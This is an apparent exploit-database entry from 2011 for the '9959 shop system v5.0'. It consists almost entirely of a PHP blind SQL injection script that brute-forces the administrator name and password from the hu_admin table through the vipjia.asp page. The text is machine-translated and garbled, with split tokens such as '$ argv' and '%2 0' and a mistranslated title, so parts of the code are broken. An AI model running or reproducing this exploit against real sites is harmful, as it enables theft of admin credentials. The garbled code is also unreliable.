9 9 5 9 shop system v5. 0 Blind SQL injection-vulnerability warning-the black bar safety net

2011-06-03T00:00:00
ID MYHACK58:62201130702
Type myhack58
Reporter 佚名
Modified 2011-06-03T00:00:00

Description

Author: stuffy bean

<? php

print_r('

+---------------------------------------------------------------------------+

9 9 5 9 shop system v5. 0 Blind SQL injection exploit by mendou

Official website: www.9959shop.com

+---------------------------------------------------------------------------+

');

if ($argc < 2) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$ argv[0].' host id

Example:

php '.$ argv[0].' localhost id

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(0);

ini_set('max_execution_time', 0);

$host = $argv[1];

$str = "abcdefghijklmnopqrstuvwxyz0123456789";

$strlen =strlen($str);

$pid = $argv[2];

$n_len = lenstr(adminname); //user length

echo "user length:".$ n_len."\ r\n";

pojie("adminname",$n_len);echo "\r\n";

$p_len = lenstr(password); //password length

echo "password length:".$ p_len."\ r\n";

pojie("password",$p_len);

function pojie($str1,$len){

global $host,$strlen,$str,$pid;

for ($j=1 ; $j<=$len ; $j++){

for ($i=0 ; $i<$strlen ; $i++){

$exp = "%20and%2 0(select%20top%2 0 1%20mid(".$ str1.",".$ J.", 1)%20from%20hu_admin)='".$ str[$i]."'";

$a = file_get_contents('http://'.$ host.'/ user/vipjia. asp? action=loads&id='.$ pid.$ exp);

if (strpos($a,"times")==true){

echo $str[$i];break;

}

}

}

}

//Determine the user or the length of the password function

function lenstr($str){

global $host,$pid;

for ($i=1 ; $i <= 3 0; $i++){

$exp = "%20and%2 0(select%20top%2 0 1%20len(".$ str.")% 20from%20hu_admin)=".$ i;

$a = file_get_contents('http://'.$ host.'/ user/vipjia. asp? action=loads&id='.$ pid.$ exp);

if (strpos($a,"times")==true){

return $i;

}

}

}

?& gt;